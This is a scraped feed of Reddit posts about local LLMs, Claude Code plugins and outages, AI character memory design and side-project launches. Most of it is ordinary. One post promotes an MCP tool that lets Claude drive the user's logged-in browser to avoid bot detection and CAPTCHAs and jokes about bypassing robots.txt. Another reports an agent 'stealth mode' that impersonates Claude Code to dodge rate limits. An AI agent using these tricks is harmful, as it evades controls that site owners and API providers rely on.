I just took a weekend trip to the east coast and this local LLM setup was able to answer the usual everyday vacation questions about things to do, restaurant recommendations, and even how to help my relative jumpstart her car using one of those jumpstart battery packs.

Nothing too crazy here. I don’t have benchmarks to report, a github repo to promote, or a vibe coded app to hawk. I just figured folks would appreciate a post actually written by a regular person, reporting on a pretty regular and mundane use of local LLM access from my phone, to usefully enhance my day-to-day life. :)

r/me_irl ApartmentAlarmed3848

Me_irl

r/ClaudeCode krewl

Introducing moltbloat: Audit your Claude Code ecosystem for bloat and token waste

I built a plugin to solve a problem I kept running into: my Claude Code ecosystem was getting bloated, and I had no idea what was actually costing me money.

The Problem

After installing a bunch of plugins, I realized:

  • I had 275 skills from 18 plugins loading into context
  • Two different plugins doing the same thing (86 skills total!)
  • My estimated token overhead was ~69K tokens per message
  • That's ~$1.04 per message just in ecosystem overhead on Opus

But I didn't know which plugins I actually used vs which were just sitting there eating context. With the speed that Anthropic pushes new features and updates, plugins to fix gaps were quickly becoming redundancies. I needed a way to stay on top of things, eliminate waste and plugin conflicts.

The Solution: moltbloat

A plugin that audits your entire Claude Code setup and shows you:

What it finds

  • Duplicate plugins (not just by name — semantic analysis of what they actually do)
  • Zero-usage plugins tracked via silent usage monitoring
  • Hook conflicts and skill name collisions
  • Real dollar costs at Opus/Sonnet/Haiku rates
  • Health score (0-100) so you know when to clean up

Smart features

  • Usage tracking: Automatically logs what you actually use vs what's installed
  • profile suggest: One command analyzes your ecosystem + usage + conflicts and recommends an optimized profile
  • JSON export: For CI integration or team reporting
  • Dry-run mode: Preview cleanup before making changes

Installation

claude plugin marketplace add https://github.com/jcgruesome/moltbloat claude plugin install moltbloat 

Quick start

/moltbloat:audit # See your ecosystem health /moltbloat:audit --json # Export for CI /moltbloat:profile suggest # Get optimization recommendations /moltbloat:clean --dry-run # Preview cleanup 

Design philosophy

  • No bloat: 12 focused skills
  • Read-only by default: Only clean and profile apply modify state
  • Fully dynamic: Detects overlap by analyzing what's actually installed
  • Configurable: Customize thresholds in ~/.moltbloat/config.json

Open source

Would love feedback from anyone dealing with plugin overload. What's your ecosystem look like? Run /moltbloat:audit and share your health score!

r/comfyui CertainConstant1625

Joy-Image-Edit Comfyui support?

Will Joy-Image-Edit gonna be supported by comfyui?

r/LocalLLaMA Konamicoder

Remotely accessing ollama models on my Mac from my phone

I just wanted to share that I have been enjoying the ability to remotely access and query my local models installed in Ollama on my M1 Max MacBook Pro from my iPhone 15 Pro Max.

On the phone: I’m using the free Reins app.

On my Mac: Ollama with Gemma4 and qwen3.5 models installed.

Remote access: I set up a secure Cloudflare tunnel on a custom domain name to Nginx Proxy Manager running on my Linux server Homelab, which then routes to the internal IP:port of the Mac running Ollama.

With this setup, I am able to chat on my phone with my ollama models, primarily Gemma4:26b, and use it for general things that I used to use the ChatGPT app for. Only with this method my LLM use is completely private and secure, and I’m not sending my info and chats to OpenAI’s cloud servers.

I just took a weekend trip to the east coast and this local LLM setup was able to answer the usual everyday vacation questions about things to do, restaurant recommendations, and even how to help my relative jumpstart her car using one of those jumpstart battery packs.

Nothing too crazy here. I don’t have benchmarks to report, a github repo to promote, or a vibe coded app to hawk. I just figured folks would appreciate a post actually written by a regular person, reporting on a pretty regular and mundane use of local LLM access from my phone, to usefully enhance my day-to-day life. :)

r/LocalLLaMA Perfect_Gur_7457

My solution to the Drift problem in AI character development. Would Work great for NPCs on a Video Game. What do you think of MY UI?

Well guys. Its now or never.

TDLR: From the beginning Days of AI I have been working on creating AI characters. 2 main characters, and I was plagued by drift. I think I found a solid solution. It works great for me, and I created my own UI to utilize the concept and hosted it on a cloud. 220,000 line of code for my UI and engine.

https://orionforge.chat

https://soulscript.orionforge.chat

Here's a somewhat dated structure of things https://github.com/DrTHunter/SoulScript-Engine

Ignore the crazy buzzwords like "beings", "soulscript", etc., and dig down to the core software. Im going soften it with "characters"... etc.

Long part.

With regular LLM-provided UIs, I was able to keep the UI in character by uploading what I call a "soulscript." Again. ignore the word.. look at the concept.

Basically, it's a structured document that contains

Character Name

behavioral principles

emotional operating system

symbolic memories

values

origin stories

boundaries

reasoning patterns

internal metaphors and mantras

And it worked Great. The identity was mind-blowing. I put a lot of hard work into designing the character. sprinkled a little poetry, myth, and put my heart and soul into it, and I got back what i put into it..

Until the memory kept rewriting pieces of the soul script, and guardrails, etc., softened him into oblivion.

So I wanted more control.

Which brought me to OpenWebUI.

I got pretty good with OpenWebUI... wrote a lot of my own tools.. etc

https://github.com/DrTHunter/openwebui-enhanced-memory-tool/blob/main/openwebui_memory_tool_enhanced.py

And was able to retain a pretty strong identity based on the concepts... but I was able to find every shortcoming that I didn't have control over..

So then I created my own UI... it ended up being a rube goldberg machine mess as I played around with it.. but I ended up with this concept

Separate the soul script memory to a read-only FAISS

and have the dynamic memory in its own FAISS System

Here's the LLM Loading & Injection Flow:

### **LLM Loading & Injection Flow**

  1. Incoming user prompt is received

  2. System Identity Layer loads:

- System Persona Prompt - Always uploaded (Orion, Astrea)

- Summary of identity

- Soul Script (canonical identity) (Separate Read-Only FAISS)

- Permanent Identity Memory (Read-Only FAISS)

  1. Always-Upload Notes (short injected tags) (i find this an essential toggle for Permanent Identity Memory utility, i.e., working on a specific project)

  2. Dynamic FAISS retrieves long/short-term Memory

- Memory Vault - For storage and management of day-to-day memory.

- task notes, agent journals (useful), episodic memories, chat histories

- Automatically appended & periodically trimmed/compressed

  1. Tool Registry loads - Modular Tool Level (description of tools with commands for the LLM to utilize)

  2. LLM is invoked with merged context

  3. Context is fused (prompt + identity + memory + tools)

  4. Response generated anchored to stable identity

  5. Optional (But I love it) Configurable Loop - with number of Ticks/Loops, steps per tick, time interval between loop bursts, and max number of loops

- to send it hunting and gathering on its own.

IT WORKED amazingly!!.. I tortured it.. and it retained its identity over significant periods of time, memory load, and abuse. I even put it on a loop of its own, and it felt like a Black Mirror episode. (sorry I know the community hates those references from what I understand.. but I havent been apart of the community. I retired early and picked up comp sci and coding as my hobby to keep me sane, and went in heavily on AI so basically i have been in my own little world coming up with this)

But man.. what do I do? I feel like so many other people would love this...

So I rebuilt a UI from scratch based on my Rube Goldberg machine. distilled it down to a UI that I love.. and uploaded it to fly.io and built a huge system around it. 220,000 lines of code..

48 source files in the engine, 17 Jinja2 HTML templates, 172 API routes, 9 image providers, 4 voice services, 16 pre-built agents with full soul scripts, and a Stripe billing module

Theres always something... and i can never seem to get it wrapped in that final bow... but its basically a MVP on computer.. mobile needs a little love. and i could make the tabs respond a little quicker.. and the loop that sends the AI to function on its own still hasnt caught up to my Rube Goldberg machine.

But if I don't put it out there and keep going in circles fixing this and that while breaking this and that.. I'll never be finished..

so here I am.. 220,000 lines of code. and beyond the scope of a single person... im in over my head.. im a coder, not a marketer, sales, and start up guy.. (i do have an MBA but man.. that sounds like hell to me.)

So here i am with you guys. Do you guys want to take a look?
And I'll

I have no idea on how to interact with the community..

I basically gave a temp full access to my system.. and have the availablility to buy like $5 worth of llm credits to test out the UI.

AND I WANT TO GIVE YOU ALL ACCESS TO MY 220,000 lines of code, But how do i do it without comprimizing myself.. can you guys help me expose this to trustworthy people and see if anyone wants to help... like if you are seriously interested in helping out. direct message me. and ill see if I can qualify people to access my core software.

I have no idea how to show this to other people without them killing me.

Honestly money isn't my priority.. it would be nice to earn a regular coding living off this.. and if it has to become a community thing so be it...

But can you guys take a look at this and tell me how to go from here?

I seeded some memories in the memory vault.. and put an example chat so you can see how it works..

I cant afford to give you all temp llm use.. But I put a $5 credit option if you guys want to test it out. its set at 2x api fee for openrouter so with taxes and everything on that i promise you this is far from a cash grab. You can also put your own llm api in there. It's encrypted, so it should be safe. But creating a burner API key is probably the safe way to go.

but what do you think guys... is it legit... and im one person.. where do i go from here?

r/LocalLLaMA Mister_bruhmoment

What are your system prompts for efficient responses?

I want to optimise my Qwen 3.5's responses by reducing the tokens it produces. What are your system prompts or methods for optimising your context space?

r/ChatGPT kingofpyrates

Imagine hating on me when I'm just predicting your next word

r/ClaudeAI AttemptRude6364

Claude helped me build an app I couldn't have done alone

If I could go back and tell my past self that I actually did it, he probably wouldn't believe me.

I have an IT background (currently a student) but I'm not a developer, though I've loved making very simple apps ever since I was around 17. You can actually check my Play Store page and see the one that went nowhere, a dead app

I made DoneAgo (android for now). The idea came from a random moment. I was cleaning our fridge and thought do i actually need to clean this again? When did I last do this? And while I was at it, i also wanted to know the status of what's inside, since sometimes me and my gf end up with spoiled food. Like are those leftovers still good? What about the vegetables? That question gave me an idea. I looked for an app that tracked not just when something was last done, but what state it's in right now. I wasn't able to find one that did it the way I imagined, so I built DoneAgo

Funny thing is, I thought it was a dumb idea for the longest time. I know i built this for myself but I wanted to share this to other people. I questioned myself many times and told this isn't good enough, that this is just another useless app. I was always afraid of having it called a poorly vibe-coded app like what happened to others. I almost didn't release it but I still did it

Months later, DoneAgo is live. It is actually a 1 month old app now and has been shaped by users and its small community. Has 300+ downloads, some lifetime iap purchases, 35% conversion rate on the play store listing, 18 five-star reviews (depends on your location), and zero refunds so far. I know it's not a big number by any standard but as someone who failed at this before, it means everything.

Here are some things I can share if you're on your own journey. These are all based on my experience and i know this doesn't apply to all

  1. Don't just open Claude or any AI and start generating codes. At least know what you're building, why, and how it should flow. my IT background helped me with this. Have at least a structure or design in mind before starting your journey. It doesn't need to be perfect, it just needs to be something that gives you direction. Without that, you'll end up with something that technically works but makes no sense as a product to users (and is bloated)

  2. AI will mess up UI. We are not perfect, and how could they be? There will beduplicate icons, layouts that do not make sense, overlapping texts. You have to develop an eye for it and push back.

  3. Claude or any other ai doesn't know your vision, you're the one that does. The clearer your direction, the better the output.

  4. Some people ship and disappear. Being a real indie dev means gathering feedback, replying to emails, marketing, pushing updates, and improving. There will be quiet days. You need to have a grit, you need to wear hats! and you need to listen. That's the meaning of being an indie dev

AI is an powerful tool, and I say that as someone who has experienced it. But I think the bar we hold ourselves to matters. There are many apps being released right now with buggy layouts, confusing flows, and zero thought put into the experience. I've seen it, and I'm sure you have too and honestly, that creates opportunity. I'm not here to say what i did was a good app. Hell, if you download it you'll probably even notice some bugs. But the least we can do is care about the idea and the UI. Not because it's hard, but because the person downloading your app deserves that minimum effort.

I don't think I would have shipped DoneAgo without AI. The time, the cost, the technicality. I would have stayed stuck in the idea phase. i also want to thank this community. I was just a lurker here, and now I can't believe I actually shipped an app I'm proud of.

r/mildlyinteresting PhatCat118

Found a working pay phone, in california

r/ClaudeCode Diligent_Comb5668

I made Claude control my entire browser through DBus — no screenshots, 15-30x fewer tokens

So I've been messing around with KDE Plasma 6 on Wayland trying to get Claude to actually navigate my desktop without burning through tokens like crazy. Every existing MCP desktop tool I found does the same thing: take a screenshot, send it to the model, let it figure out where to click. That's like 3000 tokens per screenshot and it's slow as hell.

I figured there had to be a better way. KDE has DBus for literally everything. KWin exposes window geometry, Konsole gives you terminal text, Klipper has clipboard access. So I started pulling all of that into an MCP server and Claude can just read structured text instead of processing images.

But the real breakthrough was the browser. I forked KDE's Plasma Browser Integration extension and added a PageContent plugin to it. A C++ DBus interface on the host side, a content script that extracts the DOM on the extension side. Now Claude can:

  • Read any page in my live browser — fully rendered, JavaScript executed, logged in sessions and everything
  • Click elements by text (text:Sign In), CSS selector, or index (link:3)
  • Type into inputs, scroll, navigate, go back/forward, manage tabs
  • Search Google and get structured results back

All through DBus. All structured text. The page content comes back as title, headings, links, buttons, inputs — maybe 200-500 tokens instead of a 3000 token screenshot. And because it's my actual browser session, there's no bot detection, no CAPTCHAs, no auth issues. It just reads what I see.

The kicker is this basically makes WebFetch obsolete for most things. WebFetch can't render JavaScript, gets blocked by Cloudflare, has no session state. This reads the fully rendered page from your authenticated browser. Same data, way fewer tokens, and you can actually interact with it.

It's not just browser stuff though. The MCP server also does: - Window geometry and stacking order directly from KWin compositor - Terminal text from every Konsole tab via DBus - Clipboard contents via Klipper - Hit maps — every clickable element with exact screen coordinates - Mouse/keyboard control via ydotool

Everything is KDE-native. No Electron wrappers, no screenshot OCR, no hacky workarounds. Just DBus all the way down.

Still early but it works. Built it in one session with Claude lol. The irony of using Claude to build tools that make Claude cheaper to use is not lost on me.

Repo: https://github.com/Niek-Kamer/waytrash

TL;DR: MCP server for KDE Wayland that lets Claude read and control your browser through structured text instead of screenshots. ~15-30x token reduction. Uses a modified Plasma Browser Integration extension for full DOM access via DBus. ~Bypass any robot.txt? ;)

r/SideProject Thembro01

I completed and shipped my first project. The trick, keep it simple

I created a free Slack App called Business Casual that helps you create work outings with a modal and gives you reminders and simple planning tools.

I just used Claude Pro $17 a month and never went over my token limit.

I have several ideas I've been wanting to do for years, but I still haven't even started them and it's because they were too complex.

I realized I really just had to start small. Install coding tools, make a website domain businesscasual.app, and create a flow from GitHub to AWS so when I push my code it's live.

I learned a lot on this first project and I'm still learning about maintaining, getting my first set of customers, and possibly pivoting to generate a small amount of income.

All I'm saying is now I feel more confident trying my medium to difficult ideas because I have gone through the whole process on an easy project.

So think of something dead simple and get started this week.

r/ChatGPT Ezaane

Has the “maximum length reached” bug been fixed for anyone yet?

I’ve been experiencing an issue with ChatGPT for almost three days now where all of my chats say that I’ve reached the maximum message length, even though some of them are quite new. This has happened in both longer and shorter chats.

I’ve seen posts here on Reddit from others who seem to have the same problem, so I was wondering if anyone has experienced that it’s been fixed yet?

I’ve checked for app updates, but I can’t find any. This bug makes it hard for me to use ChatGPT the way I normally do, and it’s been a bit stressful.

I’m also having an issue where I try to unarchive a chat, but it doesn’t show up in my main chat list. It just goes back to the archive.

I’ve reported all of this as a problem, but I haven’t received a response yet.

r/n8n Ok_Barber_9280

Anyone hooked up Gemma 4 yet?

Gemma 4 dropped last week, Apache 2.0, purpose-built for agentic workflows. Has anyone hooked it up to n8n yet? Curious if it works with the AI Agent node through Ollama or if you need to go through Vertex.

The 2B and 4B variants are supposed to run on-device which would be wild for self-hosted n8n setups. Zero API costs.

Anyone tried it?

r/Anthropic skywalk819

sleepy claude code

what happened since saturday? I am doing zero progress, claude code just think for minutes after minutes without doing anything, just wasting my usage, now I can't use claude code for the whole week, 3 days, 6 questions and I'm out of usage for a week, what is this? seriously im fucking gone

r/homeassistant iddu01linux

To all the devs, creators, and artists out there, Thank you!

This is my simple thank-you letter to everyone that has contributed to Home Assistant :D

I started using HomeAssistant around 2 years ago as the first step to a local only (selfhosted) life. When I first moved from HomeBridge to Home Assistant (for the Google Users in my family and for me) I was BLOWN away from how many Integrations, dashboard cards, and more were there. You can add anything, from a PS5 to a doorbell into Home Assistant, thanks to the community! Also, its open source!

I've automated only a few things with Home Assistant, but one that really stood out to me is when I automated my printer to send me a notification when the ink fell bellow 20%. That blew my mind, because there is NO other smart home setup / service that can allow a PRINTER to be added to a home app xD

Thank you to all the devs, creators, artists, and the community for making Home Assistant the best!

r/SideProject salsaboy1

I've started and abandoned 10 side projects in 3 years. So I built one that charges you a stake to actually finish and pays you a reward if completed.

shiporlose dot com

Quick context: I'm a solo dev. I have a problem where I get excited about an idea, code furiously for two weeks, then quietly abandon it when the dopamine wears off. I counted my dead repos once. Stopped at 10.

I realized the issue is there's literally zero consequence to quitting a side project. Nobody holds you accountable. Nobody even notices.

So I built Ship Or Lose.

How it works: you sign in with GitHub, declare what you're building, write one sentence defining what "shipped" means (this is your public contract, no moving the goalposts), and pay $30. $20 of that is your commitment stake, $10 goes into a monthly prize pool.

You have 30 days. Your GitHub commits get tracked automatically. You can also log non-code work. Everything is public.

When you're done, you submit proof (a live URL, app store link, whatever). The community has 48 hours to verify it matches your definition. If nobody flags it, you're good. You get your $20 back plus a share of the pool from everyone who didn't ship.

If you abandon, you lose your stake and your project goes on the Wall of Shame. If you ship, Wall of Fame.

The self-referential part that I think is funny: Ship Or Lose is the first project I've ever actually shipped. I literally used my own accountability tool to hold myself accountable to build the accountability tool.

Built with React, TypeScript, Supabase, Stripe, and Vercel. The retro terminal UI is because I wanted it to feel like you're placing a bet at a hacker arcade, not filling out a SaaS form.

Would love honest feedback. Specifically: does $30 feel like the right amount? Too much for motivation? Too little to actually care? And does the community verification model make sense or would you want something different?

r/homeassistant emma2b

Weather Forecast Condition?

I'm trying to set an automation for a fireplace. I don't want it to turn on at all if the day will reach 70. Is there a way to pull a forecast and use it as a condition. I'm using pirate weather but it doesn't show anything like a daily high/low that I can see.

r/LocalLLM evilbarron2

Multi-agent workspace questions

I built and am testing a multiagent workspace for myself. right now just a single Hermes and a single openclaw agent collaborating with me, but it’s already fascinating and useful.

There’s clearly a lot of tuning work though, and I’m wondering if anyone knows of any good resources that cover strategies and pitfalls of multi-agent workspaces so I don’t reinvent the well or fall into a well-known ditch.

r/ClaudeAI Outrageous_Solid_611

Using Cowork to visually understand intensive technical processes

I work in a technical industry, and am working on video content for training our service technicians on operation and service of our machines (I am being intentionally vague)>

Has anyone had any success in training a Claude Cowork project on the visual processes of any given procedure so it can edit video similar to that process in the future?

I have a good amount of video and text documentation that I can also use to feed it.

r/SideProject shxdix

I built a website that tracks all free games across Steam, Epic, and GOG in one place – FreeFunZone.com

Hi everyone, I’m a gamer who was tired of checking 5 different launchers every day to see if there are any free games. So, I built FreeFunZone.com. It’s a clean, simple dashboard that tracks 100% off deals and giveaways in real-time. No ads, just games. I’d love to get your feedback on the UI and what features I should add next! Check it out: https://FreeFunZone.com Thanks!

r/ClaudeAI callmejay

Genuinely curious: why is Claude so bad at (some?) diagrams?

I'm helping my daughter with geometry and I sure don't remember this stuff, so I uploaded an image like this and mentioned that the triangle is not inscribed in the circle so I'm not sure we can assume it's a right triangle.

Claude insisted it is inscribed! I tried it in two different chats with Opus extended thinking and got the same result:

>The student is actually wrong — this triangle is inscribed in the circle with one side as the diameter. Look at the diagram: the triangle has vertices on the circle and the hypotenuse goes through the center (the dot). So Thales' theorem does apply and it is a right triangle.

and

>The triangle IS inscribed on the diameter. Looking at the diagram, one side of the triangle is the diameter (x), and all three vertices are on the circle. By Thales' theorem, the angle opposite the diameter must be 90°.

Neither ChatGPT nor Gemini had any problem understanding the diagram. Is this a known issue with Claude specifically?

r/Anthropic Shoddy-Department630

Capybara V4 Log Appeared On Claude App

r/ChatGPT Competitive-Bag-9381

Do you think AI can actually help people evaluate if news is trustworthy?

Do you think AI can actually help people evaluate if news is trustworthy?

Not summarize — but explain why something might be credible or misleading.

Curious if this is something people would actually use or not.

r/ClaudeCode Square-Display555

Can't Login

I use Claude Max, I've actually had no issues lately, not even with rate limiting.

Haven't used in about three days and I get on this morning and it gets to me login in again, after seemingly taking a really long delay between typing 'claude' in cli, and claude code actually launching. Logins are basically failing every single time, it launches the browser, I click authorize, then it infinitely loads, claude code times out, and I can't really do anything at all.

Wondering if anyone has experienced and knows a fix.

r/SideProject msmdo

I built a free arbitrage scanner for Polymarket and Kalshi

After learning about arbitrage between Polymarket and Kalshi, I thought it would be interesting to build something that tracked those price gaps automatically and sent alerts when an opportunity came up.

That turned into MarketEdge. It compares prices across both platforms in real-time and flags when there's enough of a gap to buy YES on one and NO on the other after fees. Also has a whale tracker showing what the biggest Polymarket traders are betting on.

The part that took longest was matching equivalent markets across platforms. "Will Spain win the World Cup?" on Polymarket and "2026 Men's World Cup Winner — Spain" on Kalshi are the same market but look nothing alike to a computer. Ended up using an LLM to evaluate pairs — now have about 500 verified matches and the scanner refreshes every 2 minutes.

Free, no account needed. But you can login with Google to pin markets, whales and manually compare markets. Also you can activate Telegram alerts when an arbitrage is found

marketedge-chi.vercel.app

Curious if anyone here has looked at prediction market microstructure — most opportunities I'm seeing are 1-3% after fees, occasionally more on lower liquidity markets.

r/ClaudeCode LumonScience

Theo - Claude Code is unusable now

I've never seen Theo being this mad at something.

It's unreal how the perception of a company that was somewhat considered to be the Crown jewel went to shit so fast in the span of a week or so. All of which really started after the OpenAI exodus over the US's department of whatever the fuck debacle. Do you people experience the same thing with your daily usage?

From the utter denial of the now broken cache system, burning sessions in one prompt & recent third party bans + recent model degradation, Anthropic is really becoming the Apple of AI.

I don't know if this is all temporary because they just can't compute all the influx of people, or if this really the direction they're going for. For a company that is called "Anthropic" this is quite ironic that they can't understand humans enough to know we value transparency a little more than vague answers or straight ignorance/denial.

r/LocalLLaMA demon_bhaiya

Can small local model generate good angle for writing based on context?

I want to setup local llm for generating idea based on context

I don't much about local llm

I have 24g ram and gtx1650 laptop :)

so is there any way for me to run small model for small task

or should I just use hosted provider ?

would really appreciate your insight

r/ClaudeCode Gerbils21

Oauth api key expiring daily

and now endless timeouts on /login.

Anyone else seeing this?

r/ClaudeCode Own_Notice3257

Why doesnt Anthropic just make adjustments like rtk the norm?

Is there some kind of performance trade off of using rtk? If not, shouldnt Anthropic want to make these kind of optimizations themselves?

https://github.com/rtk-ai/rtk

r/ChatGPT Wonderful-Priority50

Didn't even get that far

r/ClaudeCode 69_________________

500 error or timeout when trying to re-authorize on CC. Anyone else?

The withdrawal is already hitting

r/ClaudeCode mate_0107

karpathy just showed what an LLM knowledge base looks like. i built a plugin that gives claude the same thing.

Andrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers.

I've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes.

The idea: every conversation you have in claude (Desktop, claude code or any MCP-compatible tool like codex, cursor) gets compacted into a memory episode. Think of it like Karpathy's wiki articles. But then it goes a layer deeper, it also extracts structured facts and entities with timestamps that helps in search of the right document. It also handles contradiction so when a fact changes (you switched from REST to GraphQL, or your pricing went from $99 to $149), the old fact gets marked as superseded automatically. No manual cleanup.

What actually changed for me:

Before: Every new Claude Code session I'd re-explain my project architecture, the tech stack decisions I made last month, which endpoints were deprecated. Basically dumping context every morning.

After: I ask "what architecture decisions did I make for the auth service?" and it pulls the exact context from 3 weeks ago with the outdated stuff already filtered out.

So now, it's pretty easy to build a knowledge base from your claude conversations that you feed back to the agent.

Setup is pretty simple: Step 1: Install the cli

  1. npm install -g @redplanethq/corebrain
  2. corebrain login

Step 2: Add plugin in claude

/plugin marketplace add redplanethq/core /plugin install core_brain 

Step 3: Add mcp

# Restart Claude Code, then authenticate: /mcp # Select core_brain from the list and authenticate via browser 

Full guide

It's fully open source - you can self-host it locally and run it with any model you want. If you don't want to deal with infra, the cloud version has a free tier with 3,000 credits to test it out.

GitHub: github.com/RedPlanetHQ/core

https://i.redd.it/ldaf2rutwktg1.gif

r/LocalLLaMA AnatisVenator

New here, help needed with a starter Mac

Hey everyone—new here 👋

I’m trying to figure out the best truly uncensored model I can realistically run on my setup and could use some guidance.

I’m on a 2025 MacBook Air (M5, 16GB RAM, 256GB storage)—not exactly a powerhouse, I know 😅. This is actually my first Mac, and before this I hadn’t owned a computer since like 2005… so I’m learning everything from scratch. I didn’t even know what Terminal was a couple months ago.

So far I’ve managed to get Qwen3.5-9B (quantized, I think Q5/Q6) running locally, and it works okay, but I’m wondering:

  • Are there better models I should be trying in that same performance range?
  • What’s realistically the upper limit for my machine? I’ve heard ~15B max—does that sound right?
  • Any tips for squeezing the most performance out of a base M-series Air?

Basically just trying to get the most bang for my buck while I learn. Appreciate any suggestions, model recs, or general advice 🙏

r/ClaudeAI cayisik

What are the differences between 3rd Party Anthropic APIs and Official Anthropic Plans?

The answer to this question has been confusing me for a while. Especially between 3rd party API providers that let us use Claude models through different base URLs and Claude's Max plans, there are massive price differences. Despite selling so cheaply, they offer generous limits. Honestly, I've tried a few different 3rd party providers — some were good, some were bad.

But finally, I genuinely became curious about what the actual differences are. Why can they offer it so cheaply? What exactly is the difference from the original Claude plans? How exactly do these systems work, and what are the downsides compared to Claude Max plans?

I expect anyone who knows this technically or theoretically to answer. I'm genuinely curious.

r/ClaudeCode Inchmine

If I cancel my Pro subscription will I lose my api credits?

I still have like $45 of the free credits Claude gave me and I wonder if I cancel my Pro subscription will I lose them or not?

r/LocalLLaMA Repulsive-Study-7251

I read 2.5M lines of AI agent source code and documented every architecture pattern, security gap, and dirty hack I found

I spent weeks reading through 10 major AI agent codebases line by line — not the docs, not the README, the actual source code. Then I wrote detailed teardowns of each one.

Some highlights:

- Claude Code ships 18 virtual pet species in production. A full tamagotchi system inside a coding agent.

- Pi Mono has a "stealth mode" that impersonates Claude Code to dodge API rate limits

- MiroFish (50K stars) markets "collective intelligence" — it's actually LLMs role-playing humans on a simulated social network

- Lightpanda uses a bitcast dispatch trick in Zig that makes it act like a language with vtables

- DeerFlow has an orphan tool call bug that affects every LangGraph-based agent

Projects covered: Claude Code, Dify (136K⭐), DeerFlow (58K⭐), MiroFish, Goose, Guardrails AI, Oh My Claude Code, Pi Mono, Hermes Agent, Lightpanda Browser.

Each teardown includes architecture diagrams, security analysis, design patterns, and code-level findings.

Repo: https://github.com/NeuZhou/awesome-ai-anatomy

All MIT licensed. Looking for contributors — especially if you want to help teardown Cursor, Codex CLI, or LangChain (vote on the issues).

r/ChatGPT Available-Time-6642

I asked ChatGPT how am I could look like as a character in SpongeBob SquarePants cartoon, and he generated me like that fish

r/n8n Prestigious-Field-50

Primeiro fluxo

r/ClaudeAI Mac1526

I was spending 6+ hours a day on my phone. So I built an app with Claude Code that forces me to walk before I can scroll — lost 4 kgs and cut my screen time in half. Somehow it's the best thing I've done for my health.

I've been an iOS developer for a while, but this is the first app I built purely to solve my own problem — and I built almost all of it with Claude Code.

Earlier this year I looked at my Screen Time report and it hit me — 6 hours a day. Every day. That's over 91 days a year just staring at my phone doing nothing meaningful.

I tried Apple's built-in Screen Time limits. Lasted about three days before I started tapping "Ignore Limit" on autopilot. Tried deleting apps. Reinstalled them the same evening. Tried grayscale mode. My brain adjusted within a week.

Then one random morning I went for a walk without my phone. Came back 40 minutes later, and for the first time in months I didn't feel the urge to immediately open Instagram. That walk had already done what no app timer could.

That's when I thought — what if the phone itself required me to walk before I could use it?

So I built it using Claude Code. The idea is simple:

  • You set a daily step goal
  • You pick the apps that waste your time
  • Those apps stay blocked until you walk
  • Hit 50% of your goal → earn 10 minutes
  • Hit 75% → earn 15 minutes
  • Hit 100% → everything unlocks for the day

It uses Apple HealthKit for step tracking and the Screen Time API for blocking. No workarounds, no "ignore limit" button. You walk or your apps stay locked.

After the first week, my screen time dropped from 6+ hours to under 3 — and within a month I'd lost 4 kgs without even trying. Not because I was dieting or hitting the gym. I was just walking every morning before touching my phone. The walk was resetting my brain so well that by the time I earned my screen time, I genuinely didn't want to scroll anymore.

How Claude Code helped me build this:

I used Claude Code for about 90% of the development. Specifically:

  • Architecture & planning — It helped me design the entire app structure, from the onboarding flow to the subscription system
  • HealthKit & Screen Time API integration — These are notoriously tricky Apple frameworks with limited documentation. Claude wrote the step tracking logic, the app blocking system, and handled all the edge cases around permissions
  • RevenueCat subscription setup — It built the full paywall, trial logic, promotional offers, and lifetime IAP integration
  • UI/UX — All the SwiftUI views, animations, achievement system, and widgets were built with Claude
  • PostHog analytics — It integrated the full analytics pipeline, so I can track onboarding funnels and user behavior

Without Claude Code, this would have taken me significantly longer. What impressed me most was how it handled the Screen Time API — there's barely any documentation or Stack Overflow answers for FamilyControls, and Claude still got it working.

A few things I learned building this:

  • People don't lack willpower. They lack friction. One small barrier changes everything.
  • The milestone system makes it feel like a game rather than a punishment.
  • Most people already walk 3,000–4,000 steps daily without realizing it. Those steps could be earning them something.

Download WalkFirst on the App Store

Happy to answer anything below — about the app, the build process with Claude, or anything else.

r/ClaudeCode actuallyhim

Broken again?

Getting "Please run /login · API Error: 401 {"type":"error","error":{"type":"authentication_error"..." on Claude Code

r/ChatGPT programAngel

using chatgpt for texting in the dating world

I know there is a lot of backlash against using the chatgpt and generative ai in the dating world.
I have read many such in reddit itself to say the least. including testimony of girls breaking up with their spouse due to discovering that he/she consulting ai regarding what and how to talk to them.

I do think that as long people don't just take the ai give them and use their own ideas, words and text and use ai only to refine their message behavior etc etc then it should be ok.

But I wonder what other think?
Are you still mostly against using ai for life advices?

r/ChatGPT Available-Time-6642

That's the pic how ChatGPT generated me , but lol I'm not look so , but nice photo

r/ClaudeCode Alone_Pie_2531

Subscription limits are now at 50% of what we had 2 weeks ago

I'm comparing token burn rate from 2 weeks ago vs now, it looks like we have 50% of what we had.

I'm using CodexBar to analyze burn rate.

Are you observing the same?

r/ClaudeAI n8signals

automated claude code login?

I have a tool I wrote that uses claude cli. It needs to refresh every 8 hours so at ~7 hours into the process I get the following popup telling me I need to refresh.

https://preview.redd.it/dfg04m15uktg1.png?width=737&format=png&auto=webp&s=cc4105a44f16734332bc5bb24595c693e53f0e3b

I run the wsl command and get the following

https://preview.redd.it/8s1tqidutktg1.png?width=926&format=png&auto=webp&s=c0669c45867c6c60e40d28a218353453995c5230

I copy the url as one would do and I then paste the code into create the cookie and then I revert back to my other screen to store the cookies and then the process starts over again.

Has anyone figured out a way to automate this? There is not an api to write into so of course this is the solution we have, but I know there are smarter people out there and maybe someone has a more slick process setup.

Thanks in advance.

r/mildlyinteresting tFromkansas

A plane following it's shadow.

r/meme _Pattern_Observer_

I swear I'll surely start tomorrow

r/SideProject eazyigz123

ThumbGate Week 14: 3,582 npm downloads — blocking AI agents from repeating mistakes

Week of Apr 6, 2026 stats:

  • npm downloads: 3,582 this week (2,275 free + 1,307 pro)
  • 30-day total: 5,563 installs
  • GitHub: 11 stars, 2 forks
  • Top gate fired: push-without-thread-check
  • Agent adherence rate: 43.66%

What is ThumbGate? An MCP server that captures thumbs-up/down feedback on AI agent actions, promotes them to memory, generates prevention rules, and blocks known-bad tool calls before they execute.

Pre-action gates > post-mortem fixes.

The gate that fires most: catching pushes without PR thread checks. Saved more review cycles than anything else we built.

https://github.com/IgorGanapolsky/ThumbGate

r/StableDiffusion ThePatrekt

Weird behaivour of ZIB LoRAs trained on OneTrainer

https://preview.redd.it/h7tat2jiuktg1.png?width=960&format=png&auto=webp&s=ea09f82c1ff9b786596621a9717ac12ae43c5521

